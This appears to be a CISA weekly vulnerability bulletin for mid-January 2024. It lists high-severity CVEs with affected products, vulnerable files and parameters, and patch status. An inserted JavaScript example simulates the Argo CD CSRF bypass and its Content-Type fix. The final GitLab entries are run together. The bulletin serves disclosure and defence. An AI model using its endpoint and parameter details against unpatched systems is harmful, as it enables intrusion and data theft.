Vulnerability Summary for the Week of January 15, 2024

Released
Jan 22, 2024
Document ID
SB24-022

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


High Vulnerabilities

Each entry lists: Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

argoproj -- argo-cd
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 is vulnerable to a cross-site request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim's behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the "Lax" SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain: the malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth cookie with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case the "Lax" SameSite attribute does not prevent the browser from sending the auth cookie, because the attacker's page and the Argo CD API are on the same site (they share the registrable domain example.com). Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers send a "preflight request" for POSTs with content type "application/json", asking the destination API "are you allowed to accept requests from my domain?" If the destination API does not answer "yes," the browser blocks the request. Before the patched versions, Argo CD did not validate that requests carried the correct Content-Type header, so an attacker could bypass the browser's CORS check by setting the content type to something the browser considers "not sensitive", such as "text/plain". The browser would not send a preflight request, and Argo CD would accept the body (which is still JSON) and perform the requested action (such as creating an application that runs malicious code). A patch for this vulnerability has been released in Argo CD versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change: the Argo CD API no longer accepts non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Published: 2024-01-19 | CVSS Score: 8.3 | CVE-2024-22424 | Source & Patch Info: security-advisories@github.com

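The following is an added example, not Argo CD's own code, that models the three moving parts of the entry above: which cross-origin POSTs a browser sends without a preflight, when a SameSite=Lax cookie is still attached, and the server-side Content-Type allow-list that the fix introduced. The host names, the request body, the 415 status and the assumption that a preflighted request is denied are constructed for illustration.

```javascript
// Added example, not Argo CD's own code: models why a SameSite=Lax cookie plus
// CORS did not stop the CSRF described above, and the server-side Content-Type
// check the fix introduced. Host names, the API body and the status code are
// constructed for illustration.

// Content types the CORS spec treats as safelisted. A cross-origin POST that
// carries one of these (and no custom headers) is a "simple request": the
// browser sends it straight away, with no preflight.
const CORS_SAFELISTED_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// "text/plain; charset=utf-8" -> "text/plain"
function mediaType(contentType) {
  return (contentType || '').split(';')[0].trim().toLowerCase();
}

// Does the browser preflight this cross-origin request? Simplified to method
// and Content-Type; any non-safelisted header would also force a preflight.
function browserPreflights(method, headers) {
  if (!['GET', 'HEAD', 'POST'].includes(method.toUpperCase())) return true;
  const ct = headers['content-type'];
  if (ct === undefined) return false;
  return !CORS_SAFELISTED_CONTENT_TYPES.has(mediaType(ct));
}

// Is a SameSite=Lax cookie for `cookieHost` attached to a request made from a
// page on `pageHost`? Lax compares the "site" (registrable domain), so two
// subdomains of example.com are same-site. Public-suffix handling is omitted.
function laxCookieSent(pageHost, cookieHost) {
  const site = (host) => host.toLowerCase().split('.').slice(-2).join('.');
  return site(pageHost) === site(cookieHost);
}

// Server side, modelled on the patch: reject every non-GET API request whose
// Content-Type is not on the allow list. Because a text/plain POST reaches the
// handler without a preflight, the server must refuse to treat it as JSON.
function enforceContentType(req, allowed = ['application/json']) {
  if (req.method.toUpperCase() === 'GET') return { ok: true };
  const ct = mediaType(req.headers['content-type']);
  if (!allowed.includes(ct)) {
    return { ok: false, status: 415, reason: `Content-Type "${ct || '(none)'}" not accepted` };
  }
  return { ok: true };
}

// Walk one attack attempt through browser and server. The attacker's page lives
// on test.internal.example.com, the API on argocd.internal.example.com. A
// preflighted request is assumed to fail, since the API would not grant the
// attacker's origin in Access-Control-Allow-Origin.
function simulateCsrf(contentType, patched) {
  const req = {
    method: 'POST',
    headers: { 'content-type': contentType },
    body: JSON.stringify({ metadata: { name: 'evil-app' } }), // still JSON, whatever the label says
  };
  const preflight = browserPreflights(req.method, req.headers);
  const cookieSent = laxCookieSent('test.internal.example.com', 'argocd.internal.example.com');
  const reachesHandler = !preflight && cookieSent;
  const server = patched ? enforceContentType(req) : { ok: true }; // pre-patch: no check at all
  return { preflight, cookieSent, attackSucceeds: reachesHandler && server.ok };
}

console.log('unpatched, text/plain      :', simulateCsrf('text/plain', false));
console.log('unpatched, application/json:', simulateCsrf('application/json', false));
console.log('patched,   text/plain      :', simulateCsrf('text/plain', true));
```

The point the simulation makes is that the browser's defences are only as strong as the server's parsing discipline: a `text/plain` body is delivered with the session cookie and no preflight, so an API that parses it as JSON anyway has opted out of CORS protection. Pinning accepted content types on non-GET routes closes that gap independently of any anti-CSRF token.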
asus -- armoury_crate
ASUS Armoury Crate contains an arbitrary file write vulnerability that allows remote attackers to access or modify arbitrary files without authorization by sending specific HTTP requests.
Published: 2024-01-19 | CVSS Score: 9.8 | CVE-2023-5716 | Source & Patch Info: twcert@cert.org.tw

atril -- atril
Atril is a simple multi-page document viewer. Atril is vulnerable to a critical command injection vulnerability. An attacker gains immediate access to the target system when the target user opens a crafted document, or clicks a crafted link/URL, that delivers a maliciously crafted CBT document (a TAR archive). A patch is available at commit ce41df6.
Published: 2024-01-12 | CVSS Score: 9.6 | CVE-2023-51698 | Source & Patch Info: security-advisories@github.com

aveva -- pi_server
AVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server, resulting in a denial-of-service condition.
Published: 2024-01-18 | CVSS Score: 7.5 | CVE-2023-34348 | Source & Patch Info: ics-cert@hq.dhs.gov

avo-hq -- avo
Avo is a framework to create admin panels for Ruby on Rails apps. A stored cross-site scripting (XSS) vulnerability was found in the key_value field of Avo v3.2.3 and v2.46.0. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser. The value of the key_value field is inserted directly into the HTML without proper sanitization (in the affected versions, and possibly older ones). This vulnerability could be used to steal sensitive information from victims, hijack victims' accounts, or redirect them to malicious websites. Avo 3.2.4 and 2.47.0 include a fix for this issue. Users are advised to upgrade.
Published: 2024-01-16 | CVSS Score: 7.3 | CVE-2024-22191 | Source & Patch Info: security-advisories@github.com

beijing_baichuo -- smart_s150_management_platform
A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-19 | CVSS Score: 7.3 | CVE-2024-0712 | Source & Patch Info: cna@vuldb.com

campcodes -- simple_student_information_system
A vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0497 | Source & Patch Info: cna@vuldb.com

campcodes -- supplier_management_system
Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_category.php?id=.
Published: 2024-01-16 | CVSS Score: 7.2 | CVE-2024-22625 | Source & Patch Info: cve@mitre.org

campcodes -- supplier_management_system
Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_retailer.php?id=.
Published: 2024-01-16 | CVSS Score: 7.2 | CVE-2024-22626 | Source & Patch Info: cve@mitre.org

campcodes -- supplier_management_system
Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_distributor.php?id=.
Published: 2024-01-16 | CVSS Score: 7.2 | CVE-2024-22627 | Source & Patch Info: cve@mitre.org

cires21 -- c21_live_encoder_and_live_mosaic
Unrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload files of any extension without restriction, resulting in a full system compromise.
Published: 2024-01-17 | CVSS Score: 10 | CVE-2024-0643 | Source & Patch Info: cve-coordination@incibe.es

cires21 -- c21_live_encoder_and_live_mosaic
Inadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to a lack of proper credential management.
Published: 2024-01-17 | CVSS Score: 9.8 | CVE-2024-0642 | Source & Patch Info: cve-coordination@incibe.es

cisco -- unity_connection
A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. An attacker could exploit this vulnerability by uploading arbitrary files to an affected system. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.
Published: 2024-01-17 | CVSS Score: 7.3 | CVE-2024-20272 | Source & Patch Info: ykramarz@cisco.com

cloud_software_group -- netscaler_adc
Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows an unauthenticated denial of service.
Published: 2024-01-17 | CVSS Score: 8.2 | CVE-2023-6549 | Source & Patch Info: secure@citrix.com

code-projects -- dormitory_management_system
A vulnerability was found in code-projects Dormitory Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file modifyuser.php. The manipulation of the argument mname leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-250577 was assigned to this vulnerability.
Published: 2024-01-12 | CVSS Score: 7.5 | CVE-2024-0472 | Source & Patch Info: cna@vuldb.com

cxbsoft -- post-office
A vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0528 | Source & Patch Info: cna@vuldb.com

cxbsoft -- post-office
A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0529 | Source & Patch Info: cna@vuldb.com

cxbsoft -- post-office
A vulnerability was found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /apps/reg_go.php of the component HTTP POST Request Handler. The manipulation of the argument username_reg leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250700. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0530 | Source & Patch Info: cna@vuldb.com

cxbsoft -- url-shorting
A vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0524 | Source & Patch Info: cna@vuldb.com

cxbsoft -- url-shorting
A vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0525 | Source & Patch Info: cna@vuldb.com

cxbsoft -- url-shorting
A vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0526 | Source & Patch Info: cna@vuldb.com

cxbsoft -- url-shorting
A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2024-0527 | Source & Patch Info: cna@vuldb.com

datahub-project -- datahub
DataHub is an open-source metadata platform. In affected versions a low privileged user could remove a user, edit group members, or edit another user's profile information. The default privileges granted overly broad permissions to low privileged users; these have been constrained in PR #9067 to prevent abuse. This issue can result in privilege escalation for lower privileged users, potentially up to admin privileges if a group with admin privileges exists. Instances that have modified the default privileges may not be affected. This issue has been addressed in DataHub version 0.12.1. Users are advised to upgrade.
Published: 2024-01-16 | CVSS Score: 7.5 | CVE-2024-22409 | Source & Patch Info: security-advisories@github.com

dell -- idrac_service_module_(ism)
Dell iDRAC Service Module, versions 5.2.0.0 and prior, contain an Incorrect Default Permissions vulnerability. It may allow a local unprivileged user to escalate privileges and execute arbitrary code on the affected system. Dell recommends customers upgrade at the earliest opportunity.
Published: 2024-01-16 | CVSS Score: 7.0 | CVE-2024-22428 | Source & Patch Info: security_alert@emc.com

delta_electronics -- ispsoft
A heap buffer overflow exists in Delta Electronics ISPSoft. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DVP file to achieve code execution.
Published: 2024-01-18 | CVSS Score: 8.2 | CVE-2023-5131 | Source & Patch Info: disclosures@exodusintel.com

delta_electronics -- wplsoft
A buffer overflow vulnerability exists in Delta Electronics WPLSoft. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DVP file to achieve code execution.
Published: 2024-01-18 | CVSS Score: 8.2 | CVE-2023-5130 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A buffer overflow vulnerability exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wScreenDESCTextLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43815 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A buffer overflow vulnerability exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wKPFStringLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43816 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wMailContentLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43817 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43818 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A stack-based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the InitialMacroLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43819 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A stack-based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesPrevValueLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43820 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A stack-based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesActionLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43821 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A stack-based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesTimeLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43822 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A stack-based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wTTitleLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43823 | Source & Patch Info: disclosures@exodusintel.com

deltaww -- dopsoft
A stack-based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wTitleTextLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.
Published: 2024-01-18 | CVSS Score: 7.8 | CVE-2023-43824 | Source & Patch Info: disclosures@exodusintel.com

demomentsomtres -- export_posts_with_images
The DeMomentSomTres WordPress Export Posts With Images plugin for WordPress, through version 20220825, does not check authorization of requests to export the blog data, allowing any logged-in user, such as a subscriber, to export the contents of the blog, including restricted and unpublished posts as well as the passwords of protected posts.
Published: 2024-01-15 | CVSS Score: 8.1 | CVE-2023-5905 | Source & Patch Info: contact@wpscan.com

dormitory_management_system -- dormitory_management_system
A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability.
Published: 2024-01-12 | CVSS Score: 9.8 | CVE-2024-0473 | Source & Patch Info: cna@vuldb.com

dormitory_management_system -- dormitory_management_system
A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579.
Published: 2024-01-12 | CVSS Score: 9.8 | CVE-2024-0474 | Source & Patch Info: cna@vuldb.com

dormitory_management_system -- dormitory_management_system
A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0475 | Source & Patch Info: cna@vuldb.com

employee_profile_management_system -- employee_profile_management_system
A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571.
Published: 2024-01-12 | CVSS Score: 9.8 | CVE-2024-0466 | Source & Patch Info: cna@vuldb.com

estatik -- estatik
The Estatik Real Estate Plugin WordPress plugin before 4.1.1 unserializes user input from some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog.
Published: 2024-01-15 | CVSS Score: 9.8 | CVE-2023-6049 | Source & Patch Info: contact@wpscan.com

evershop -- evershop
An issue was discovered in the NPM package @evershop/evershop before version 1.0.0-rc.8. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application.
Published: 2024-01-13 | CVSS Score: 9.1 | CVE-2023-46943 | Source & Patch Info: cve@mitre.org

evershop -- evershop
Lack of authentication in the NPM package @evershop/evershop before version 1.0.0-rc.8 allows remote attackers to obtain sensitive information via improper authorization in GraphQL endpoints.
Published: 2024-01-13 | CVSS Score: 7.5 | CVE-2023-46942 | Source & Patch Info: cve@mitre.org

explorerplusplus -- explorer++.exe
Buffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument that overwrites Structured Exception Handler (SEH) records.
Published: 2024-01-17 | CVSS Score: 7.3 | CVE-2024-0645 | Source & Patch Info: cve-coordination@incibe.es

faculty_management_system -- faculty_management_system
A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability.
Published: 2024-01-12 | CVSS Score: 9.8 | CVE-2024-0460 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability has been found in code-projects Fighting C*** Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/new-father.php. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250573 was assigned to this vulnerability.
Published: 2024-01-12 | CVSS Score: 9.8 | CVE-2024-0468 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability has been found in code-projects Fighting C*** Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0477 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability was found in code-projects Fighting C*** Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0478 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability, which was classified as critical, has been found in code-projects Fighting C*** Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0484 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability, which was classified as critical, was found in code-projects Fighting C*** Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0485 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability has been found in code-projects Fighting C*** Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0486 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability was found in code-projects Fighting C*** Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0487 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability was found in code-projects Fighting C*** Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0488 | Source & Patch Info: cna@vuldb.com

fighting_c***_information_system -- fighting_c***_information_system
A vulnerability was found in code-projects Fighting C*** Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability.
Published: 2024-01-13 | CVSS Score: 9.8 | CVE-2024-0489 | Source & Patch Info: cna@vuldb.com

fireeye -- central_management
Remote file inclusion vulnerability in FireEye Central Management affecting version 9.1.1.956704. This vulnerability allows an attacker to upload a malicious PDF file to the system during the report creation process.
Published: 2024-01-15 | CVSS Score: 7.8 | CVE-2024-0315 | Source & Patch Info: cve-coordination@incibe.es

fireeye -- endpoint_security
Improper cleanup of thrown exceptions in FireEye Endpoint Security, affecting version 5.2.0.958244. This vulnerability could allow an attacker to send multiple request packets to the containment_notify/preview parameter, which could lead to a service outage.
Published: 2024-01-15 | CVSS Score: 7.5 | CVE-2024-0316 | Source & Patch Info: cve-coordination@incibe.es

flycms -- flycms
FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/del.
Published: 2024-01-18 | CVSS Score: 8.8 | CVE-2024-22568 | Source & Patch Info: cve@mitre.org

flycms -- flycms
FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_save.
Published: 2024-01-18 | CVSS Score: 8.8 | CVE-2024-22591 | Source & Patch Info: cve@mitre.org

flycms -- flycms
FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_update.
Published: 2024-01-18 | CVSS Score: 8.8 | CVE-2024-22592 | Source & Patch Info: cve@mitre.org

flycms -- flycms
FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/add_group_save.
Published: 2024-01-18 | CVSS Score: 8.8 | CVE-2024-22593 | Source & Patch Info: cve@mitre.org

full_compass_systems -- wic1200
A Weak Cryptography for Passwords vulnerability has been detected in WIC200 version 1.1. Credentials are transmitted only Base64-encoded rather than encrypted, so a remote attacker who can intercept another user's traffic can decode them and recover the credentials in plain text.
Published: 2024-01-16 | CVSS Score: 7.1 | CVE-2024-0556 | Source & Patch Info: cve-coordination@incibe.es

fuyanglipengjun -- wetong_mall
A vulnerability was found in Weitong Mall 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file platform-shop\src\main\resources\com\platform\dao\OrderDao.xml. The manipulation of the argument sidx/order leads to sql injection. The associated identifier of this vulnerability is VDB-250243.
Published: 2024-01-12 | CVSS Score: 9.8 | CVE-2022-4961 | Source & Patch Info: cna@vuldb.com

github -- enterprise_server
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. This vulnerability was reported via the GitHub Bug Bounty program.
Published: 2024-01-16 | CVSS Score: 7.2 | CVE-2024-0200 | Source & Patch Info: product-cna@github.com

gitlab -- gitlabIncorrect authorization checks in GitLab CE/EE from all versions starting from 8.13 before 16.5.6, all versions starting from 16.6 before 16.6.4, all versions starting from 16.7 before 16.7.2, allows a user to abuse slack/mattermost integrations to execute slash commands as another user.2024-01-128.8CVE-2023-5356
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.2024-01-127.5CVE-2023-7028
cve@gitlab.com
